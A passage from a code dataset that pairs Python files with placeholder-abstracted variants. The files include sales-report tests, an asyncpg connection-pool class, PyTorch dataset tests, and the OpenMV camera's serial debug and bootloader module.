1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n <function token>\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n <function token>\n <function token>\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n<class token>\n"
] | false |
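The sales_report module exercised by the tests above is not part of this entry, so its generator bodies are unknown; the sketch below is one plausible shape that would satisfy the asserted lines and the totals surfaced through StopIteration.value (the Record field order, the itertools.groupby grouping, and the exact leading spaces are assumptions taken from the tests):

from collections import namedtuple
from itertools import groupby

# Hypothetical Record layout inferred from Record('0001', '001', '12') in the tests.
Record = namedtuple('Record', 'product group value')

def process_product(product, records):
    # A generator may `return` a value; callers see it as StopIteration.value
    # (or capture it directly with `yield from`).
    total = sum(int(r.value) for r in records)
    yield f'    Product: {product} Value: {total}'   # leading spaces must match the tests
    return total

def process_product_group(group, records):
    yield f'Group: {group}'
    group_total = 0
    for product, product_records in groupby(records, key=lambda r: r.product):
        group_total += yield from process_product(product, product_records)
    yield f'  Group total: {group_total}'
    yield ''
    return group_total

def process_all(records):
    lines = []
    total = 0
    for group, group_records in groupby(records, key=lambda r: r.group):
        gen = process_product_group(group, group_records)
        while True:
            try:
                lines.append(next(gen))
            except StopIteration as stop:
                total += stop.value
                break
    lines.append(f'Total: {total}')
    return lines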
99,816 | da64ecab1447abc75b238b8effb6c516ffb36d07 | from asyncpg import connect, InterfaceError, create_pool
import logging
import asyncio
from async_timeout import timeout
class PSQLConnector():
def __init__(self, conf):
self.loop = asyncio.get_event_loop()
self.sync_type = conf["sync_type"]
self.conf = conf
self.pool = self.loop.run_until_complete(self._create_pool())
async def _create_pool(self):
pool = await create_pool(
database=self.conf["database"],
user=self.conf["user"],
password=self.conf["password"],
host=self.conf.get("host", "localhost"),
port=self.conf.get("port", 5432),
max_inactive_connection_lifetime=0.05)
logging.info('Successfully connected with local PSQL')
return pool
async def _select_single_execute(self, query):
value = await self.pool.fetch(query, timeout=0.05)
return value[0][0]
async def select_single(self, query):
try:
async with timeout(0.05):
return await self._select_single_execute(query)
except InterfaceError as e:
if "connection already closed" in str(e).lower():
self.pool = self.loop.run_until_complete(self._create_pool())
async with timeout(0.05):
return await self._select_single_execute(query)
else:
raise
    def close(self):
        # The connector holds a pool rather than a single connection, so close the
        # pool; asyncpg's Pool.close() is a coroutine, hence run_until_complete here.
        self.loop.run_until_complete(self.pool.close())
| [
"from asyncpg import connect, InterfaceError, create_pool\nimport logging\nimport asyncio\nfrom async_timeout import timeout\n\n\nclass PSQLConnector():\n def __init__(self, conf):\n self.loop = asyncio.get_event_loop()\n self.sync_type = conf[\"sync_type\"]\n self.conf = conf\n self.pool = self.loop.run_until_complete(self._create_pool())\n\n async def _create_pool(self):\n pool = await create_pool(\n database=self.conf[\"database\"],\n user=self.conf[\"user\"],\n password=self.conf[\"password\"],\n host=self.conf.get(\"host\", \"localhost\"),\n port=self.conf.get(\"port\", 5432),\n max_inactive_connection_lifetime=0.05)\n\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if \"connection already closed\" in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n\n def close(self):\n self.conn.close()\n",
"from asyncpg import connect, InterfaceError, create_pool\nimport logging\nimport asyncio\nfrom async_timeout import timeout\n\n\nclass PSQLConnector:\n\n def __init__(self, conf):\n self.loop = asyncio.get_event_loop()\n self.sync_type = conf['sync_type']\n self.conf = conf\n self.pool = self.loop.run_until_complete(self._create_pool())\n\n async def _create_pool(self):\n pool = await create_pool(database=self.conf['database'], user=self.\n conf['user'], password=self.conf['password'], host=self.conf.\n get('host', 'localhost'), port=self.conf.get('port', 5432),\n max_inactive_connection_lifetime=0.05)\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if 'connection already closed' in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n\n def close(self):\n self.conn.close()\n",
"<import token>\n\n\nclass PSQLConnector:\n\n def __init__(self, conf):\n self.loop = asyncio.get_event_loop()\n self.sync_type = conf['sync_type']\n self.conf = conf\n self.pool = self.loop.run_until_complete(self._create_pool())\n\n async def _create_pool(self):\n pool = await create_pool(database=self.conf['database'], user=self.\n conf['user'], password=self.conf['password'], host=self.conf.\n get('host', 'localhost'), port=self.conf.get('port', 5432),\n max_inactive_connection_lifetime=0.05)\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if 'connection already closed' in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n\n def close(self):\n self.conn.close()\n",
"<import token>\n\n\nclass PSQLConnector:\n\n def __init__(self, conf):\n self.loop = asyncio.get_event_loop()\n self.sync_type = conf['sync_type']\n self.conf = conf\n self.pool = self.loop.run_until_complete(self._create_pool())\n\n async def _create_pool(self):\n pool = await create_pool(database=self.conf['database'], user=self.\n conf['user'], password=self.conf['password'], host=self.conf.\n get('host', 'localhost'), port=self.conf.get('port', 5432),\n max_inactive_connection_lifetime=0.05)\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if 'connection already closed' in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n <function token>\n",
"<import token>\n\n\nclass PSQLConnector:\n <function token>\n\n async def _create_pool(self):\n pool = await create_pool(database=self.conf['database'], user=self.\n conf['user'], password=self.conf['password'], host=self.conf.\n get('host', 'localhost'), port=self.conf.get('port', 5432),\n max_inactive_connection_lifetime=0.05)\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if 'connection already closed' in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
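For context, a minimal driver for the PSQLConnector entry above. The module name, configuration values and query are invented for illustration, and no error handling is shown; select_single is a coroutine, so it is run on the loop the connector created for itself:

from psql_connector import PSQLConnector   # hypothetical module name for the class above

conf = {
    'sync_type': 'local',        # keys mirror what PSQLConnector.__init__ reads
    'database': 'mydb',
    'user': 'postgres',
    'password': 'secret',
    'host': 'localhost',
    'port': 5432,
}

connector = PSQLConnector(conf)
value = connector.loop.run_until_complete(
    connector.select_single('SELECT count(*) FROM some_table'))
print(value)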
99,817 | 964b935334b2f8e1a1b5926be6885b33e977a9c6 |
from torch.utils.data import Dataset, DataLoader
import numpy as np
import pandas as pd
from task1 import get_slice_set
from task2 import HeartDataset, np_collate_dict_to_tuple
def test_task2_output_2_elements(batch):
print('testing: 2 elements in batch')
assert len(batch)==2
print('passed')
def test_task2_output_1st_images(batch):
print('testing: batch is an numpy array')
assert isinstance(batch[0], np.ndarray)
print('passed')
print('testing: batch is a 2D (color or grayscale) numpy array')
assert (len(batch[0].shape) in (2,3))
print('passed')
def test_shuffling(hdset, shuffle=True):
print(f"testing for shuffle={shuffle}")
num_reps = 3
first_batches = []
for rep in range(num_reps):
hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,
collate_fn=np_collate_dict_to_tuple)
for x in hdloader:
break
first_batches.append(x[0])
imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]
assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle
print('passed')
if __name__ == '__main__':
dir_data = 'final_data'
fn_link = f'{dir_data}/link.csv'
metadata = pd.read_csv(fn_link)
print( f'{metadata.shape[0]} series parsed')
filenames = get_slice_set(metadata, dir_data)
print( f'{filenames.shape[0]} files parsed')
hdset = HeartDataset(filenames)
# basic tests
hdloader = DataLoader(hdset, batch_size=8, shuffle=True,
collate_fn=np_collate_dict_to_tuple)
for batch in hdloader:
break
test_task2_output_2_elements(batch)
test_task2_output_1st_images(batch)
test_shuffling(hdset, shuffle = True)
test_shuffling(hdset, shuffle = False)
| [
"\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport pandas as pd\n\nfrom task1 import get_slice_set\nfrom task2 import HeartDataset, np_collate_dict_to_tuple\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch)==2\n print('passed')\n \n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert (len(batch[0].shape) in (2,3))\n print('passed')\n\ndef test_shuffling(hdset, shuffle=True):\n print(f\"testing for shuffle={shuffle}\")\n num_reps = 3\n first_batches = []\n for rep in range(num_reps):\n hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,\n collate_fn=np_collate_dict_to_tuple)\n for x in hdloader:\n break\n first_batches.append(x[0])\n\n imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]\n \n assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle\n print('passed')\n\n\nif __name__ == '__main__':\n\n dir_data = 'final_data'\n fn_link = f'{dir_data}/link.csv'\n\n metadata = pd.read_csv(fn_link)\n print( f'{metadata.shape[0]} series parsed')\n\n filenames = get_slice_set(metadata, dir_data)\n print( f'{filenames.shape[0]} files parsed')\n\n hdset = HeartDataset(filenames)\n\n # basic tests\n hdloader = DataLoader(hdset, batch_size=8, shuffle=True,\n collate_fn=np_collate_dict_to_tuple)\n for batch in hdloader:\n break\n\n test_task2_output_2_elements(batch)\n\n test_task2_output_1st_images(batch)\n\n test_shuffling(hdset, shuffle = True)\n test_shuffling(hdset, shuffle = False)\n\n",
"from torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport pandas as pd\nfrom task1 import get_slice_set\nfrom task2 import HeartDataset, np_collate_dict_to_tuple\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert len(batch[0].shape) in (2, 3)\n print('passed')\n\n\ndef test_shuffling(hdset, shuffle=True):\n print(f'testing for shuffle={shuffle}')\n num_reps = 3\n first_batches = []\n for rep in range(num_reps):\n hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,\n collate_fn=np_collate_dict_to_tuple)\n for x in hdloader:\n break\n first_batches.append(x[0])\n imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]\n assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle\n print('passed')\n\n\nif __name__ == '__main__':\n dir_data = 'final_data'\n fn_link = f'{dir_data}/link.csv'\n metadata = pd.read_csv(fn_link)\n print(f'{metadata.shape[0]} series parsed')\n filenames = get_slice_set(metadata, dir_data)\n print(f'{filenames.shape[0]} files parsed')\n hdset = HeartDataset(filenames)\n hdloader = DataLoader(hdset, batch_size=8, shuffle=True, collate_fn=\n np_collate_dict_to_tuple)\n for batch in hdloader:\n break\n test_task2_output_2_elements(batch)\n test_task2_output_1st_images(batch)\n test_shuffling(hdset, shuffle=True)\n test_shuffling(hdset, shuffle=False)\n",
"<import token>\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert len(batch[0].shape) in (2, 3)\n print('passed')\n\n\ndef test_shuffling(hdset, shuffle=True):\n print(f'testing for shuffle={shuffle}')\n num_reps = 3\n first_batches = []\n for rep in range(num_reps):\n hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,\n collate_fn=np_collate_dict_to_tuple)\n for x in hdloader:\n break\n first_batches.append(x[0])\n imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]\n assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle\n print('passed')\n\n\nif __name__ == '__main__':\n dir_data = 'final_data'\n fn_link = f'{dir_data}/link.csv'\n metadata = pd.read_csv(fn_link)\n print(f'{metadata.shape[0]} series parsed')\n filenames = get_slice_set(metadata, dir_data)\n print(f'{filenames.shape[0]} files parsed')\n hdset = HeartDataset(filenames)\n hdloader = DataLoader(hdset, batch_size=8, shuffle=True, collate_fn=\n np_collate_dict_to_tuple)\n for batch in hdloader:\n break\n test_task2_output_2_elements(batch)\n test_task2_output_1st_images(batch)\n test_shuffling(hdset, shuffle=True)\n test_shuffling(hdset, shuffle=False)\n",
"<import token>\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert len(batch[0].shape) in (2, 3)\n print('passed')\n\n\ndef test_shuffling(hdset, shuffle=True):\n print(f'testing for shuffle={shuffle}')\n num_reps = 3\n first_batches = []\n for rep in range(num_reps):\n hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,\n collate_fn=np_collate_dict_to_tuple)\n for x in hdloader:\n break\n first_batches.append(x[0])\n imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]\n assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle\n print('passed')\n\n\n<code token>\n",
"<import token>\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert len(batch[0].shape) in (2, 3)\n print('passed')\n\n\n<function token>\n<code token>\n",
"<import token>\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
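task2.py is not included in this entry, so np_collate_dict_to_tuple is constrained only indirectly by the tests above: a batch must be a 2-tuple whose first element is a numpy image array. One plausible sketch, assuming each HeartDataset item is a dict holding 'image' and 'mask' arrays (both key names are guesses):

import numpy as np

def np_collate_dict_to_tuple(samples):
    # samples: list of per-slice dicts from HeartDataset.__getitem__,
    # e.g. {'image': HxW array, 'mask': HxW array}; the key names are assumed.
    images = np.stack([s['image'] for s in samples])   # -> (batch, H, W), so 3 dims
    masks = np.stack([s['mask'] for s in samples])
    return images, masks                               # len(batch) == 2, batch[0] is an ndarray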
99,818 | 62aec5a2a10b37ba3b321a1731dcdb0c45768ffb | #!/usr/bin/env python2
# This file is part of the OpenMV project.
#
# Copyright (c) 2013-2021 Ibrahim Abdelkader <[email protected]>
# Copyright (c) 2013-2021 Kwabena W. Agyeman <[email protected]>
#
# This work is licensed under the MIT license, see the file LICENSE for details.
#
# Openmv module.
import struct
import sys,time
import serial
import platform
import numpy as np
from PIL import Image
__serial = None
__FB_HDR_SIZE =12
# USB Debug commands
__USBDBG_CMD = 48
__USBDBG_FW_VERSION = 0x80
__USBDBG_FRAME_SIZE = 0x81
__USBDBG_FRAME_DUMP = 0x82
__USBDBG_ARCH_STR = 0x83
__USBDBG_SCRIPT_EXEC = 0x05
__USBDBG_SCRIPT_STOP = 0x06
__USBDBG_SCRIPT_SAVE = 0x07
__USBDBG_SCRIPT_RUNNING = 0x87
__USBDBG_TEMPLATE_SAVE = 0x08
__USBDBG_DESCRIPTOR_SAVE= 0x09
__USBDBG_ATTR_READ = 0x8A
__USBDBG_ATTR_WRITE = 0x0B
__USBDBG_SYS_RESET = 0x0C
__USBDBG_SYS_RESET_TO_BL= 0x0E
__USBDBG_FB_ENABLE = 0x0D
__USBDBG_TX_BUF_LEN = 0x8E
__USBDBG_TX_BUF = 0x8F
ATTR_CONTRAST =0
ATTR_BRIGHTNESS =1
ATTR_SATURATION =2
ATTR_GAINCEILING=3
__BOOTLDR_START = 0xABCD0001
__BOOTLDR_RESET = 0xABCD0002
__BOOTLDR_ERASE = 0xABCD0004
__BOOTLDR_WRITE = 0xABCD0008
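# Note (added): the debug requests below share a common framing. struct.pack('<BBI', ...)
# sends one byte 0x30 (__USBDBG_CMD), one byte selecting the sub-command, and a 32-bit
# little-endian length telling the firmware how many bytes the host will read back or
# write next (get_attr additionally packs the attribute id into the same request). In
# this module, sub-commands with the high bit set (0x80 and above) are the ones that
# are followed by a read of that many bytes; the others are writes or bare commands.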
def init(port, baudrate=921600, timeout=0.3):
global __serial
# open CDC port
__serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)
def disconnect():
global __serial
try:
if (__serial):
__serial.close()
__serial = None
except:
pass
def set_timeout(timeout):
__serial.timeout = timeout
def fb_size():
# read fb header
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_FRAME_SIZE, __FB_HDR_SIZE))
return struct.unpack("III", __serial.read(12))
def fb_dump():
size = fb_size()
if (not size[0]):
# frame not ready
return None
if (size[2] > 2): #JPEG
num_bytes = size[2]
else:
num_bytes = size[0]*size[1]*size[2]
# read fb data
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_FRAME_DUMP, num_bytes))
buff = __serial.read(num_bytes)
if size[2] == 1: # Grayscale
y = np.fromstring(buff, dtype=np.uint8)
buff = np.column_stack((y, y, y))
elif size[2] == 2: # RGB565
arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')
r = (((arr & 0xF800) >>11)*255.0/31.0).astype(np.uint8)
g = (((arr & 0x07E0) >>5) *255.0/63.0).astype(np.uint8)
b = (((arr & 0x001F) >>0) *255.0/31.0).astype(np.uint8)
buff = np.column_stack((r,g,b))
else: # JPEG
try:
buff = np.asarray(Image.frombuffer("RGB", size[0:2], buff, "jpeg", "RGB", ""))
except Exception as e:
print ("JPEG decode error (%s)"%(e))
return None
if (buff.size != (size[0]*size[1]*3)):
return None
return (size[0], size[1], buff.reshape((size[1], size[0], 3)))
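# Note (added): np.fromstring above is deprecated and newer NumPy rejects it for binary
# input; a present-day port would use np.frombuffer instead. A standalone sketch of the
# same RGB565 -> RGB888 expansion (the '>u2' dtype assumes a little-endian host, which
# is what .newbyteorder('S') effectively selects in fb_dump):
def _rgb565_to_rgb888_sketch(buff, width, height):
    arr = np.frombuffer(buff, dtype='>u2')
    r = (((arr & 0xF800) >> 11) * 255.0 / 31.0).astype(np.uint8)
    g = (((arr & 0x07E0) >> 5) * 255.0 / 63.0).astype(np.uint8)
    b = ((arr & 0x001F) * 255.0 / 31.0).astype(np.uint8)
    return np.column_stack((r, g, b)).reshape(height, width, 3)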
def exec_script(buf):
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SCRIPT_EXEC, len(buf)))
__serial.write(buf.encode())
def stop_script():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))
def script_running():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SCRIPT_RUNNING, 4))
return struct.unpack("I", __serial.read(4))[0]
def save_template(x, y, w, h, path):
buf = struct.pack("IIII", x, y, w, h) + path
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE, len(buf)))
__serial.write(buf)
def save_descriptor(x, y, w, h, path):
buf = struct.pack("HHHH", x, y, w, h) + path
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_DESCRIPTOR_SAVE, len(buf)))
__serial.write(buf)
def set_attr(attr, value):
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))
__serial.write(struct.pack("<II", attr, value))
def get_attr(attr):
__serial.write(struct.pack("<BBIh", __USBDBG_CMD, __USBDBG_ATTR_READ, 1, attr))
return __serial.read(1)
def reset():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SYS_RESET, 0))
def reset_to_bl():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SYS_RESET_TO_BL, 0))
def bootloader_start():
__serial.write(struct.pack("<I", __BOOTLDR_START))
return struct.unpack("I", __serial.read(4))[0] == __BOOTLDR_START
def bootloader_reset():
__serial.write(struct.pack("<I", __BOOTLDR_RESET))
def flash_erase(sector):
__serial.write(struct.pack("<II", __BOOTLDR_ERASE, sector))
def flash_write(buf):
__serial.write(struct.pack("<I", __BOOTLDR_WRITE) + buf)
def tx_buf_len():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))
return struct.unpack("I", __serial.read(4))[0]
def tx_buf(bytes):
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_TX_BUF, bytes))
return __serial.read(bytes)
def fw_version():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_FW_VERSION, 12))
return struct.unpack("III", __serial.read(12))
def enable_fb(enable):
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))
__serial.write(struct.pack("<I", enable))
def arch_str():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_ARCH_STR, 64))
return __serial.read(64).split('\0', 1)[0]
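# Note (added): the __main__ block at the bottom of this file reads the script's text
# output once, after a fixed 250 ms sleep. A long-running script would instead be polled
# in a loop; a minimal sketch using only the helpers defined in this module (the poll
# interval is an arbitrary placeholder):
def _stream_output_sketch(poll_interval=0.1):
    while True:
        n = tx_buf_len()
        if n:
            print(tx_buf(n).decode(), end='')
        time.sleep(poll_interval)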
if __name__ == '__main__':
if len(sys.argv)!= 3:
print ('usage: pyopenmv.py <port> <script>')
sys.exit(1)
with open(sys.argv[2], 'r') as fin:
buf = fin.read()
disconnect()
init(sys.argv[1])
stop_script()
exec_script(buf)
tx_len = tx_buf_len()
time.sleep(0.250)
if (tx_len):
print(tx_buf(tx_len).decode())
disconnect()
| [
"#!/usr/bin/env python2\n# This file is part of the OpenMV project.\n#\n# Copyright (c) 2013-2021 Ibrahim Abdelkader <[email protected]>\n# Copyright (c) 2013-2021 Kwabena W. Agyeman <[email protected]>\n#\n# This work is licensed under the MIT license, see the file LICENSE for details.\n#\n# Openmv module.\n\nimport struct\nimport sys,time\nimport serial\nimport platform\nimport numpy as np\nfrom PIL import Image\n\n__serial = None\n__FB_HDR_SIZE =12\n\n# USB Debug commands\n__USBDBG_CMD = 48\n__USBDBG_FW_VERSION = 0x80\n__USBDBG_FRAME_SIZE = 0x81\n__USBDBG_FRAME_DUMP = 0x82\n__USBDBG_ARCH_STR = 0x83\n__USBDBG_SCRIPT_EXEC = 0x05\n__USBDBG_SCRIPT_STOP = 0x06\n__USBDBG_SCRIPT_SAVE = 0x07\n__USBDBG_SCRIPT_RUNNING = 0x87\n__USBDBG_TEMPLATE_SAVE = 0x08\n__USBDBG_DESCRIPTOR_SAVE= 0x09\n__USBDBG_ATTR_READ = 0x8A\n__USBDBG_ATTR_WRITE = 0x0B\n__USBDBG_SYS_RESET = 0x0C\n__USBDBG_SYS_RESET_TO_BL= 0x0E\n__USBDBG_FB_ENABLE = 0x0D\n__USBDBG_TX_BUF_LEN = 0x8E\n__USBDBG_TX_BUF = 0x8F\n\nATTR_CONTRAST =0\nATTR_BRIGHTNESS =1\nATTR_SATURATION =2\nATTR_GAINCEILING=3\n\n__BOOTLDR_START = 0xABCD0001\n__BOOTLDR_RESET = 0xABCD0002\n__BOOTLDR_ERASE = 0xABCD0004\n__BOOTLDR_WRITE = 0xABCD0008\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n # open CDC port\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\ndef disconnect():\n global __serial\n try:\n if (__serial):\n __serial.close()\n __serial = None\n except:\n pass\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\ndef fb_size():\n # read fb header\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_FRAME_SIZE, __FB_HDR_SIZE))\n return struct.unpack(\"III\", __serial.read(12))\n\ndef fb_dump():\n size = fb_size()\n\n if (not size[0]):\n # frame not ready\n return None\n\n if (size[2] > 2): #JPEG\n num_bytes = size[2]\n else:\n num_bytes = size[0]*size[1]*size[2]\n\n # read fb data\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_FRAME_DUMP, num_bytes))\n buff = __serial.read(num_bytes)\n\n if size[2] == 1: # Grayscale\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2: # RGB565\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 0xF800) >>11)*255.0/31.0).astype(np.uint8)\n g = (((arr & 0x07E0) >>5) *255.0/63.0).astype(np.uint8)\n b = (((arr & 0x001F) >>0) *255.0/31.0).astype(np.uint8)\n buff = np.column_stack((r,g,b))\n else: # JPEG\n try:\n buff = np.asarray(Image.frombuffer(\"RGB\", size[0:2], buff, \"jpeg\", \"RGB\", \"\"))\n except Exception as e:\n print (\"JPEG decode error (%s)\"%(e))\n return None\n\n if (buff.size != (size[0]*size[1]*3)):\n return None\n\n return (size[0], size[1], buff.reshape((size[1], size[0], 3)))\n\ndef exec_script(buf):\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SCRIPT_EXEC, len(buf)))\n __serial.write(buf.encode())\n\ndef stop_script():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\ndef script_running():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack(\"I\", __serial.read(4))[0]\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack(\"IIII\", x, y, w, h) + path\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE, len(buf)))\n __serial.write(buf)\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack(\"HHHH\", x, y, w, h) + path\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n 
